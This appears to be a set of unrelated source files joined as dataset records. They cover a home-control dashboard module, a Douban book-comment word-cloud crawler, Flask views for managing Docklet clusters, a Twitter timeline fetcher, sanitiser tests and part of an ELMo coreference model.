@self.core.event_bus.register(EVENT_CORE_BOOTSTRAP_COMPLETE)
async def add_websocket_commands(event) -> None:
ws_mod = cast("WebSocketModule", self.core.modules.websocket)
add_commands(ws_mod.add_command_handler)
async def load_yaml_config(self) -> None:
"""Loads YAML config"""
cfg = cast(List[Dict[str, Any]], await self.core.cfg.register_domain(
"dashboards",
CONFIG_SCHEMA,
default=[]
))
for dashboard_config in cfg:
dashboard = Dashboard(
identifier=dashboard_config["identifier"],
name=dashboard_config.get("name"),
icon=dashboard_config.get("icon"),
sections=dashboard_config["sections"],
provider="yaml"
)
self.register_dashboard(dashboard)
def register_dashboard(self, dashboard: Dashboard) -> None:
"""Registers a Dashboard"""
self.dashboards[dashboard.identifier] = dashboard
| <filename>homecontrol/modules/dashboard/module.py
"""The dashboard module"""
from typing import TYPE_CHECKING, Any, Dict, List, cast
import voluptuous as vol
from attr import attrib, attrs
from homecontrol.const import EVENT_CORE_BOOTSTRAP_COMPLETE
from homecontrol.dependencies.entity_types import ModuleDef
from homecontrol.dependencies.linter_friendly_attrs import LinterFriendlyAttrs
from .commands import add_commands
if TYPE_CHECKING:
from homecontrol.modules.websocket.module import Module as WebSocketModule
SPEC = {
"name": "Dashboard",
"description": "Provides the Frontend's dashboards"
}
DASHBOARD_SCHEMA = vol.Schema({
vol.Required("identifier"): str,
vol.Required("sections", default=list): list,
vol.Optional("name"): str,
vol.Optional("icon"): str
}, extra=vol.ALLOW_EXTRA)
CONFIG_SCHEMA = vol.Schema([DASHBOARD_SCHEMA])
@attrs(slots=True)
class Dashboard(LinterFriendlyAttrs):
"""A dashboard"""
identifier: str = attrib()
provider: str = attrib()
name: str = attrib(default=None)
icon: str = attrib(default="")
sections: list = attrib(default=[])
def __attrs_post_init__(self) -> None:
self.name = self.name or self.identifier
class Module(ModuleDef):
"""Provides dashboard configuration for frontend"""
dashboards: Dict[str, Dashboard]
async def init(self) -> None:
self.dashboards = {}
await self.load_yaml_config()
@self.core.event_bus.register(EVENT_CORE_BOOTSTRAP_COMPLETE)
async def add_websocket_commands(event) -> None:
ws_mod = cast("WebSocketModule", self.core.modules.websocket)
add_commands(ws_mod.add_command_handler)
async def load_yaml_config(self) -> None:
"""Loads YAML config"""
cfg = cast(List[Dict[str, Any]], await self.core.cfg.register_domain(
"dashboards",
CONFIG_SCHEMA,
default=[]
))
for dashboard_config in cfg:
dashboard = Dashboard(
identifier=dashboard_config["identifier"],
name=dashboard_config.get("name"),
icon=dashboard_config.get("icon"),
sections=dashboard_config["sections"],
provider="yaml"
)
self.register_dashboard(dashboard)
def register_dashboard(self, dashboard: Dashboard) -> None:
"""Registers a Dashboard"""
self.dashboards[dashboard.identifier] = dashboard
| en | 0.468201 | The dashboard module A dashboard Provides dashboard configuration for frontend Loads YAML config Registers a Dashboard | 2.255016 | 2 |
mapping/star/discretized_bath/base/eocoeff.py | fhoeb/py-mapping | 1 | 6614010 | """
Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to
div/0 exceptions)
"""
class EOFCoefficients(Exception):
def __init__(self, nof_calc_coeff):
"""
Constructor
:param nof_calc_coeff: Number of successfully calculated discretization coefficients
"""
self.nof_calc_coeff = nof_calc_coeff
| """
Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to
div/0 exceptions)
"""
class EOFCoefficients(Exception):
def __init__(self, nof_calc_coeff):
"""
Constructor
:param nof_calc_coeff: Number of successfully calculated discretization coefficients
"""
self.nof_calc_coeff = nof_calc_coeff
| en | 0.933898 | Exception, which is thrown if no more coefficients can be calculated (either due to a full buffer or due to div/0 exceptions) Constructor :param nof_calc_coeff: Number of successfully calculated discretization coefficients | 2.263463 | 2 |
crawler.py | ManiaciaChao/naive-wordcloud | 0 | 6614011 | import re
import json
import time
import jieba
import logging
import requests
import numpy as np
from urllib.parse import quote
from wordcloud import WordCloud
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
jieba.setLogLevel(logging.INFO)
stopwords_path = "./input/stopwords.txt"
stopwords_set = set(line.strip()
for line in open(stopwords_path, "r", encoding="utf8"))
class DoubanCrawler:
def __init__(self):
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
'Host': 'book.douban.com'
} # book's headers
self.book_search_url = "https://book.douban.com/j/subject_suggest?q="
self.book_url = "https://book.douban.com/subject/%s/"
self.book_comment_url = "https://book.douban.com/subject/%s/comments/?start=%d&limit=20&status=P&sort=new_score"
self.words_dict = {} # word cloud input
def info_crawl(self, name, keywords, bg_image=None):
name_str = self.__handle_name(name) # url encodeded
self.book_search_url += name_str
self.book_url, num_str = self.__find_url(self.book_search_url)
for i in range(0, 10):
url = self.book_comment_url % (num_str, i*20)
time.sleep(np.random.randint(1, 3))
print("crawling page %d" % (i + 1), url)
r = requests.get(url, headers=self.headers)
soup = BeautifulSoup(r.content, 'lxml')
comment_list = soup.find_all('span', class_='short')
for ct in comment_list:
line = ct.text.strip()
if any(line.find(e) >= 0 for e in keywords):
words = filter(lambda x: x not in stopwords_set,
jieba.cut(line))
for word in words:
if word not in self.words_dict:
self.words_dict[word] = 1
else:
self.words_dict[word] += 1
self.__comment_to_txt(name, comment_list)
self.__plot_wordcloud(name)
def __plot_wordcloud(self, name):
print("plot wordcloud...")
word_cloud = WordCloud(
scale=10,
font_path='C:/Windows/Fonts/msyh.ttc',
background_color="white", width=1000, height=1000
).generate_from_frequencies(self.words_dict)
file_name = "./output/{}.png".format(name)
word_cloud.to_file(file_name)
plt.imshow(word_cloud, interpolation='bilinear')
plt.axis('off')
plt.show()
def __comment_to_txt(self, name, clist):
file_name = "./output/{}.txt".format(name)
with open(file_name, 'w+', encoding='utf-8') as f:
for ct in clist:
f.write(ct.text)
f.close()
def __handle_name(self, name):
return str(quote(name))
def __find_url(self, url):
r = requests.get(url, headers=self.headers)
json_data = json.loads(r.text)
address_num = re.search('[0-9]+', json_data[0]['url'])
print(self.book_url % address_num.group(0))
return self.book_url % address_num, address_num.group(0)
if __name__ == '__main__':
book_name = input("type book name: ")
print('got boot name: ', book_name)
keywords = input("type keywords (separated by space): ").split()
print('got keywords: ', keywords)
crawler = DoubanCrawler()
crawler.info_crawl(book_name, keywords)
| import re
import json
import time
import jieba
import logging
import requests
import numpy as np
from urllib.parse import quote
from wordcloud import WordCloud
from bs4 import BeautifulSoup
import matplotlib.pyplot as plt
jieba.setLogLevel(logging.INFO)
stopwords_path = "./input/stopwords.txt"
stopwords_set = set(line.strip()
for line in open(stopwords_path, "r", encoding="utf8"))
class DoubanCrawler:
def __init__(self):
self.headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0",
'Host': 'book.douban.com'
} # book's headers
self.book_search_url = "https://book.douban.com/j/subject_suggest?q="
self.book_url = "https://book.douban.com/subject/%s/"
self.book_comment_url = "https://book.douban.com/subject/%s/comments/?start=%d&limit=20&status=P&sort=new_score"
self.words_dict = {} # word cloud input
def info_crawl(self, name, keywords, bg_image=None):
name_str = self.__handle_name(name) # url encodeded
self.book_search_url += name_str
self.book_url, num_str = self.__find_url(self.book_search_url)
for i in range(0, 10):
url = self.book_comment_url % (num_str, i*20)
time.sleep(np.random.randint(1, 3))
print("crawling page %d" % (i + 1), url)
r = requests.get(url, headers=self.headers)
soup = BeautifulSoup(r.content, 'lxml')
comment_list = soup.find_all('span', class_='short')
for ct in comment_list:
line = ct.text.strip()
if any(line.find(e) >= 0 for e in keywords):
words = filter(lambda x: x not in stopwords_set,
jieba.cut(line))
for word in words:
if word not in self.words_dict:
self.words_dict[word] = 1
else:
self.words_dict[word] += 1
self.__comment_to_txt(name, comment_list)
self.__plot_wordcloud(name)
def __plot_wordcloud(self, name):
print("plot wordcloud...")
word_cloud = WordCloud(
scale=10,
font_path='C:/Windows/Fonts/msyh.ttc',
background_color="white", width=1000, height=1000
).generate_from_frequencies(self.words_dict)
file_name = "./output/{}.png".format(name)
word_cloud.to_file(file_name)
plt.imshow(word_cloud, interpolation='bilinear')
plt.axis('off')
plt.show()
def __comment_to_txt(self, name, clist):
file_name = "./output/{}.txt".format(name)
with open(file_name, 'w+', encoding='utf-8') as f:
for ct in clist:
f.write(ct.text)
f.close()
def __handle_name(self, name):
return str(quote(name))
def __find_url(self, url):
r = requests.get(url, headers=self.headers)
json_data = json.loads(r.text)
address_num = re.search('[0-9]+', json_data[0]['url'])
print(self.book_url % address_num.group(0))
return self.book_url % address_num, address_num.group(0)
if __name__ == '__main__':
book_name = input("type book name: ")
print('got boot name: ', book_name)
keywords = input("type keywords (separated by space): ").split()
print('got keywords: ', keywords)
crawler = DoubanCrawler()
crawler.info_crawl(book_name, keywords)
| en | 0.484863 | # book's headers # word cloud input # url encodeded | 2.822434 | 3 |
web/webViews/cluster.py | SourceZh/Docklet | 0 | 6614012 | from flask import session
from webViews.view import normalView
from webViews.dockletrequest import dockletRequest
from webViews.dashboard import *
import time, re
class addClusterView(normalView):
template_path = "addCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/image/list/")
images = result.get("images")
if (result):
return self.render(self.template_path, user = session['username'], images = images)
else:
self.error()
class createClusterView(normalView):
template_path = "dashboard.html"
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:],
}
result = dockletRequest.post("/cluster/create/", data)
if(result.get('success', None) == "true"):
return dashboardView.as_view()
#return self.render(self.template_path, user = session['username'])
else:
return self.render(self.error_path, message = result.get('message'))
class descriptionImageView(normalView):
template_path = "image_description.html"
@classmethod
def get(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"imagename": self.image[:index2],
"imageowner": self.image[index2+1:index1],
"imagetype": self.image[index1+1:]
}
result = dockletRequest.post("/image/description/", data)
if(result):
description = result.get("message")
return self.render(self.template_path, description = description)
else:
self.error()
class scaleoutView(normalView):
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:]
}
result = dockletRequest.post("/cluster/scaleout/", data)
if(result.get('success', None) == "true"):
return configView.as_view()
else:
return self.render(self.error_path, message = result.get('message'))
class scaleinView(normalView):
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"containername":self.containername
}
result = dockletRequest.post("/cluster/scalein/", data)
if(result):
return configView.as_view()
else:
self.error()
class listClusterView(normalView):
template_path = "listCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/cluster/list/")
clusters = result.get("clusters")
if(result):
return self.render(self.template_path, user = session['username'], clusters = clusters)
else:
self.error()
class startClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/start/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class stopClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/stop/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class flushClusterView(normalView):
success_path = "opsuccess.html"
failed_path = "opfailed.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"from_lxc": self.containername
}
result = dockletRequest.post("/cluster/flush/", data)
if(result):
if result.get('success') == "true":
return self.render(self.success_path, user = session['username'])
else:
return self.render(self.failed_path, user = session['username'])
else:
self.error()
class deleteClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/delete/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class detailClusterView(normalView):
template_path = "listcontainer.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/info/", data)
if(result):
message = result.get('message')
containers = message['containers']
status = message['status']
return self.render(self.template_path, containers = containers, user = session['username'], clustername = self.clustername, status = status)
else:
self.error()
class saveImageView(normalView):
template_path = "saveconfirm.html"
success_path = "opsuccess.html"
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"image": self.imagename,
"containername": self.containername,
"description": self.description,
"isforce": self.isforce
}
result = dockletRequest.post("/cluster/save/", data)
if(result):
if result.get('success') == 'true':
#return self.render(self.success_path, user = session['username'])
return configView.as_view()
#res = detailClusterView()
#res.clustername = self.clustername
#return res.as_view()
else:
return self.render(self.template_path, containername = self.containername, clustername = self.clustername, image = self.imagename, user = session['username'], description = self.description)
else:
self.error()
class shareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/share/", data)
if(result):
return configView.as_view()
else:
self.error()
class unshareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/unshare/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/delete/", data)
if(result):
return configView.as_view()
else:
self.error()
class addproxyView(normalView):
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"ip": self.ip,
"port": self.port
}
result = dockletRequest.post("/addproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteproxyView(normalView):
@classmethod
def get(self):
data = {
"clustername":self.clustername
}
result = dockletRequest.post("/deleteproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
@classmethod
def post(self):
return self.get()
class configView(normalView):
@classmethod
def get(self):
images = dockletRequest.post('/image/list/').get('images')
clusters = dockletRequest.post("/cluster/list/").get("clusters")
clusters_info = {}
data={}
for cluster in clusters:
data["clustername"] = cluster
result = dockletRequest.post("/cluster/info/",data).get("message")
clusters_info[cluster] = result
return self.render("config.html", images = images, clusters = clusters_info, mysession=dict(session))
@classmethod
def post(self):
return self.get()
| from flask import session
from webViews.view import normalView
from webViews.dockletrequest import dockletRequest
from webViews.dashboard import *
import time, re
class addClusterView(normalView):
template_path = "addCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/image/list/")
images = result.get("images")
if (result):
return self.render(self.template_path, user = session['username'], images = images)
else:
self.error()
class createClusterView(normalView):
template_path = "dashboard.html"
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:],
}
result = dockletRequest.post("/cluster/create/", data)
if(result.get('success', None) == "true"):
return dashboardView.as_view()
#return self.render(self.template_path, user = session['username'])
else:
return self.render(self.error_path, message = result.get('message'))
class descriptionImageView(normalView):
template_path = "image_description.html"
@classmethod
def get(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"imagename": self.image[:index2],
"imageowner": self.image[index2+1:index1],
"imagetype": self.image[index1+1:]
}
result = dockletRequest.post("/image/description/", data)
if(result):
description = result.get("message")
return self.render(self.template_path, description = description)
else:
self.error()
class scaleoutView(normalView):
error_path = "error.html"
@classmethod
def post(self):
index1 = self.image.rindex("_")
index2 = self.image[:index1].rindex("_")
data = {
"clustername": self.clustername,
'imagename': self.image[:index2],
'imageowner': self.image[index2+1:index1],
'imagetype': self.image[index1+1:]
}
result = dockletRequest.post("/cluster/scaleout/", data)
if(result.get('success', None) == "true"):
return configView.as_view()
else:
return self.render(self.error_path, message = result.get('message'))
class scaleinView(normalView):
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"containername":self.containername
}
result = dockletRequest.post("/cluster/scalein/", data)
if(result):
return configView.as_view()
else:
self.error()
class listClusterView(normalView):
template_path = "listCluster.html"
@classmethod
def get(self):
result = dockletRequest.post("/cluster/list/")
clusters = result.get("clusters")
if(result):
return self.render(self.template_path, user = session['username'], clusters = clusters)
else:
self.error()
class startClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/start/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class stopClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/stop/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class flushClusterView(normalView):
success_path = "opsuccess.html"
failed_path = "opfailed.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername,
"from_lxc": self.containername
}
result = dockletRequest.post("/cluster/flush/", data)
if(result):
if result.get('success') == "true":
return self.render(self.success_path, user = session['username'])
else:
return self.render(self.failed_path, user = session['username'])
else:
self.error()
class deleteClusterView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/delete/", data)
if(result):
return dashboardView.as_view()
else:
return self.error()
class detailClusterView(normalView):
template_path = "listcontainer.html"
@classmethod
def get(self):
data = {
"clustername": self.clustername
}
result = dockletRequest.post("/cluster/info/", data)
if(result):
message = result.get('message')
containers = message['containers']
status = message['status']
return self.render(self.template_path, containers = containers, user = session['username'], clustername = self.clustername, status = status)
else:
self.error()
class saveImageView(normalView):
template_path = "saveconfirm.html"
success_path = "opsuccess.html"
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"image": self.imagename,
"containername": self.containername,
"description": self.description,
"isforce": self.isforce
}
result = dockletRequest.post("/cluster/save/", data)
if(result):
if result.get('success') == 'true':
#return self.render(self.success_path, user = session['username'])
return configView.as_view()
#res = detailClusterView()
#res.clustername = self.clustername
#return res.as_view()
else:
return self.render(self.template_path, containername = self.containername, clustername = self.clustername, image = self.imagename, user = session['username'], description = self.description)
else:
self.error()
class shareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/share/", data)
if(result):
return configView.as_view()
else:
self.error()
class unshareImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/unshare/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteImageView(normalView):
template_path = "dashboard.html"
@classmethod
def get(self):
data = {
"image": self.image
}
result = dockletRequest.post("/image/delete/", data)
if(result):
return configView.as_view()
else:
self.error()
class addproxyView(normalView):
@classmethod
def post(self):
data = {
"clustername": self.clustername,
"ip": self.ip,
"port": self.port
}
result = dockletRequest.post("/addproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
class deleteproxyView(normalView):
@classmethod
def get(self):
data = {
"clustername":self.clustername
}
result = dockletRequest.post("/deleteproxy/", data)
if(result):
return configView.as_view()
else:
self.error()
@classmethod
def post(self):
return self.get()
class configView(normalView):
@classmethod
def get(self):
images = dockletRequest.post('/image/list/').get('images')
clusters = dockletRequest.post("/cluster/list/").get("clusters")
clusters_info = {}
data={}
for cluster in clusters:
data["clustername"] = cluster
result = dockletRequest.post("/cluster/info/",data).get("message")
clusters_info[cluster] = result
return self.render("config.html", images = images, clusters = clusters_info, mysession=dict(session))
@classmethod
def post(self):
return self.get()
| en | 0.355158 | #return self.render(self.template_path, user = session['username']) #return self.render(self.success_path, user = session['username']) #res = detailClusterView() #res.clustername = self.clustername #return res.as_view() | 2.214666 | 2 |
files/generateIntegerFile.py | benitodarder/python-workshop | 0 | 6614013 | <filename>files/generateIntegerFile.py
import datetime;
import random;
def main(args):
randomIntegersUpperLimit = int(args[2])
file = open(args[1], 'w')
t0 = datetime.datetime.now().timestamp()
for index in range(randomIntegersUpperLimit):
file.write(str(random.randrange(randomIntegersUpperLimit)) + "\n")
t1 = datetime.datetime.now().timestamp()
print("Python generated " + args[2] + " pseudo random integers in " + str((t1 - t0) * 1000) + "ms. and saved them to: " + args[1])
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv)) | <filename>files/generateIntegerFile.py
import datetime;
import random;
def main(args):
randomIntegersUpperLimit = int(args[2])
file = open(args[1], 'w')
t0 = datetime.datetime.now().timestamp()
for index in range(randomIntegersUpperLimit):
file.write(str(random.randrange(randomIntegersUpperLimit)) + "\n")
t1 = datetime.datetime.now().timestamp()
print("Python generated " + args[2] + " pseudo random integers in " + str((t1 - t0) * 1000) + "ms. and saved them to: " + args[1])
return 0
if __name__ == '__main__':
import sys
sys.exit(main(sys.argv)) | none | 1 | 3.633726 | 4 | |
twitterlib/timeline.py | MichaelCurrin/twitter-lib-python | 0 | 6614014 | """
Timeline module.
"""
import sys
import tweepy
from . import api_auth, constants, lib
def get_timeline(api, screen_name=None, user_id=None):
"""
Get tweets of a selected user.
"""
count = constants.MaxCount.TIMELINE
tweet_mode = constants.TweetMode.EXTENDED
cursor = tweepy.Cursor(
api.user_timeline,
screen_name=screen_name,
user_id=user_id,
count=count.value,
tweet_mode=tweet_mode.value,
)
return cursor
def main(args):
"""
Command-line entry-point.
"""
api = api_auth.app_access_token_api()
assert len(args) == 1, "Expected screen name as an argument"
screen_name = args.pop(0)
cursor = get_timeline(api, screen_name=screen_name)
lib.print_tweets(cursor.items())
if __name__ == "__main__":
main(sys.argv[1:])
| """
Timeline module.
"""
import sys
import tweepy
from . import api_auth, constants, lib
def get_timeline(api, screen_name=None, user_id=None):
"""
Get tweets of a selected user.
"""
count = constants.MaxCount.TIMELINE
tweet_mode = constants.TweetMode.EXTENDED
cursor = tweepy.Cursor(
api.user_timeline,
screen_name=screen_name,
user_id=user_id,
count=count.value,
tweet_mode=tweet_mode.value,
)
return cursor
def main(args):
"""
Command-line entry-point.
"""
api = api_auth.app_access_token_api()
assert len(args) == 1, "Expected screen name as an argument"
screen_name = args.pop(0)
cursor = get_timeline(api, screen_name=screen_name)
lib.print_tweets(cursor.items())
if __name__ == "__main__":
main(sys.argv[1:])
| en | 0.558229 | Timeline module. Get tweets of a selected user. Command-line entry-point. | 3.146187 | 3 |
tests/test_sanitiser.py | chrisbrake/PythonSandbox | 1 | 6614015 | <filename>tests/test_sanitiser.py
from hypothesis import given
from hypothesis.strategies import dictionaries, text, integers
from unittest import TestCase
from sanitiser import sanitiser
class TestSanitiser(TestCase):
""" Testing Sanitiser Functions """
@given(test_dict=dictionaries(
keys=text(), values=text(), min_size=1))
def test_keys_are_strings_true(self, test_dict):
"""
Assuming a dict of at least one entry that contains text we should
get a True back
"""
self.assertTrue(sanitiser.keys_and_values_are_strings(test_dict))
@given(test_dict=dictionaries(
keys=integers(), values=integers(), min_size=1))
def test_keys_are_strings_false(self, test_dict):
"""
Given an empty dict, or one that contains something other than
text we should fail.
"""
self.assertFalse(sanitiser.keys_and_values_are_strings(test_dict))
| <filename>tests/test_sanitiser.py
from hypothesis import given
from hypothesis.strategies import dictionaries, text, integers
from unittest import TestCase
from sanitiser import sanitiser
class TestSanitiser(TestCase):
""" Testing Sanitiser Functions """
@given(test_dict=dictionaries(
keys=text(), values=text(), min_size=1))
def test_keys_are_strings_true(self, test_dict):
"""
Assuming a dict of at least one entry that contains text we should
get a True back
"""
self.assertTrue(sanitiser.keys_and_values_are_strings(test_dict))
@given(test_dict=dictionaries(
keys=integers(), values=integers(), min_size=1))
def test_keys_are_strings_false(self, test_dict):
"""
Given an empty dict, or one that contains something other than
text we should fail.
"""
self.assertFalse(sanitiser.keys_and_values_are_strings(test_dict))
| en | 0.917186 | Testing Sanitiser Functions Assuming a dict of at least one entry that contains text we should get a True back Given an empty dict, or one that contains something other than text we should fail. | 3.39442 | 3 |
src/contextual_model_elmo.py | matejklemen/slovene-coreference-resolution | 2 | 6614016 | import argparse
import json
import logging
import os
import sys
from itertools import chain
from typing import Optional, Dict
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from allennlp.data.token_indexers.elmo_indexer import ELMoCharacterMapper
from allennlp.modules.elmo import Elmo, batch_to_ids
from sklearn.model_selection import KFold
from common import ControllerBase, NeuralCoreferencePairScorer
from utils import split_into_sets, fixed_split, KFoldStateCache
from data import read_corpus, Document
parser = argparse.ArgumentParser()
parser.add_argument("--model_name", type=str, default=None)
parser.add_argument("--hidden_size", type=int, default=128)
parser.add_argument("--fc_hidden_size", type=int, default=150)
parser.add_argument("--dropout", type=float, default=0.2)
parser.add_argument("--learning_rate", type=float, default=0.001)
parser.add_argument("--num_epochs", type=int, default=10)
parser.add_argument("--max_segment_size", type=int, default=None,
help="Size of nonoverlapping segments into which a document will be split, with each segment being "
"processed independently. By default, a segment corresponds to a single sentence.")
parser.add_argument("--dataset", type=str, default="coref149")
parser.add_argument("--random_seed", type=int, default=13)
parser.add_argument("--freeze_pretrained", action="store_true")
parser.add_argument("--fixed_split", action="store_true")
parser.add_argument("--kfold_state_cache_path", type=str, default=None)
DEVICE = torch.device("cuda") if torch.cuda.is_available() else torch.device("cpu")
class ContextualControllerELMo(ControllerBase):
def __init__(self,
hidden_size,
dropout,
pretrained_embeddings_dir,
dataset_name,
fc_hidden_size=150,
freeze_pretrained=True,
learning_rate=0.001,
layer_learning_rate: Optional[Dict[str, float]] = None,
max_segment_size=None, # if None, process sentences independently
max_span_size=10,
model_name=None):
self.hidden_size = hidden_size
self.dropout = dropout
self.freeze_pretrained = freeze_pretrained
self.fc_hidden_size = fc_hidden_size
self.max_span_size = max_span_size
self.max_segment_size = max_segment_size
self.learning_rate = learning_rate
self.layer_learning_rate = layer_learning_rate if layer_learning_rate is not None else {}
self.pretrained_embeddings_dir = pretrained_embeddings_dir
self.embedder = Elmo(options_file=os.path.join(pretrained_embeddings_dir, "options.json"),
weight_file=os.path.join(pretrained_embeddings_dir, "slovenian-elmo-weights.hdf5"),
dropout=(0.0 if freeze_pretrained else dropout),
num_output_representations=1,
requires_grad=(not freeze_pretrained)).to(DEVICE)
embedding_size = self.embedder.get_output_dim()
self.context_encoder = nn.LSTM(input_size=embedding_size, hidden_size=hidden_size,
batch_first=True, bidirectional=True).to(DEVICE)
self.scorer = NeuralCoreferencePairScorer(num_features=(2 * hidden_size),
hidden_size=fc_hidden_size,
dropout=dropout).to(DEVICE)
params_to_update = [
{
"params": self.scorer.parameters(),
"lr": self.layer_learning_rate.get("lr_scorer", self.learning_rate)
},
{
"params": self.context_encoder.parameters(),
"lr": self.layer_learning_rate.get("lr_context_encoder", self.learning_rate)
}
]
if not freeze_pretrained:
params_to_update.append({
"params": self.embedder.parameters(),
"lr": self.layer_learning_rate.get("lr_embedder", self.learning_rate)
})
self.optimizer = optim.Adam(params_to_update, lr=self.learning_rate)
super().__init__(learning_rate=learning_rate, dataset_name=dataset_name, model_name=model_name)
logging.info(f"Initialized contextual ELMo-based model with name {self.model_name}.")
@property
def model_base_dir(self):
return "contextual_model_elmo"
def train_mode(self):
if not self.freeze_pretrained:
self.embedder.train()
self.context_encoder.train()
self.scorer.train()
def eval_mode(self):
self.embedder.eval()
self.context_encoder.eval()
self.scorer.eval()
def load_checkpoint(self):
self.loaded_from_file = True
self.context_encoder.load_state_dict(torch.load(os.path.join(self.path_model_dir, "context_encoder.th"),
map_location=DEVICE))
self.scorer.load_state_dict(torch.load(os.path.join(self.path_model_dir, "scorer.th"),
map_location=DEVICE))
path_to_embeddings = os.path.join(self.path_model_dir, "embeddings.th")
if os.path.isfile(path_to_embeddings):
logging.info(f"Loading fine-tuned ELMo weights from '{path_to_embeddings}'")
self.embedder.load_state_dict(torch.load(path_to_embeddings, map_location=DEVICE))
@staticmethod
def from_pretrained(model_dir):
controller_config_path = os.path.join(model_dir, "controller_config.json")
with open(controller_config_path, "r", encoding="utf-8") as f_config:
pre_config = json.load(f_config)
instance = ContextualControllerELMo(**pre_config)
instance.load_checkpoint()
return instance
def save_pretrained(self, model_dir):
if not os.path.exists(model_dir):
os.makedirs(model_dir)
# Write controller config (used for instantiation)
controller_config_path = os.path.join(model_dir, "controller_config.json")
with open(controller_config_path, "w", encoding="utf-8") as f_config:
json.dump({
"hidden_size": self.hidden_size,
"dropout": self.dropout,
"pretrained_embeddings_dir": self.pretrained_embeddings_dir,
"dataset_name": self.dataset_name,
"fc_hidden_size": self.fc_hidden_size,
"freeze_pretrained": self.freeze_pretrained,
"learning_rate": self.learning_rate,
"layer_learning_rate": self.layer_learning_rate,
"max_segment_size": self.max_segment_size,
"max_span_size": self.max_span_size,
"model_name": self.model_name
}, fp=f_config, indent=4)
torch.save(self.context_encoder.state_dict(), os.path.join(self.path_model_dir, "context_encoder.th"))
torch.save(self.scorer.state_dict(), os.path.join(self.path_model_dir, "scorer.th"))
# Save fine-tuned ELMo embeddings only if they're not frozen
if not self.freeze_pretrained:
torch.save(self.embedder.state_dict(), os.path.join(self.path_model_dir, "embeddings.th"))
def save_checkpoint(self):
logging.warning("save_checkpoint() is deprecated. Use save_pretrained() instead")
self.save_pretrained(self.path_model_dir)
def _prepare_doc(self, curr_doc: Document) -> Dict:
""" Returns a cache dictionary with preprocessed data. This should only be called once per document, since
data inside same document does not get shuffled. """
ret = {}
# By default, each sentence is its own segment, meaning sentences are processed independently
if self.max_segment_size is None:
def get_position(t):
return t.sentence_index, t.position_in_sentence
_encoded_segments = batch_to_ids(curr_doc.raw_sentences())
# Optionally, one can specify max_segment_size, in which case segments of tokens are processed independently
else:
def get_position(t):
doc_position = t.position_in_document
return doc_position // self.max_segment_size, doc_position % self.max_segment_size
flattened_doc = list(chain(*curr_doc.raw_sentences()))
num_segments = (len(flattened_doc) + self.max_segment_size - 1) // self.max_segment_size
_encoded_segments = \
batch_to_ids([flattened_doc[idx_seg * self.max_segment_size: (idx_seg + 1) * self.max_segment_size]
for idx_seg in range(num_segments)])
encoded_segments = []
# Convention: Add a PAD word ([0] * max_chars vector) at the end of each segment, for padding mentions
for curr_sent in _encoded_segments:
encoded_segments.append(
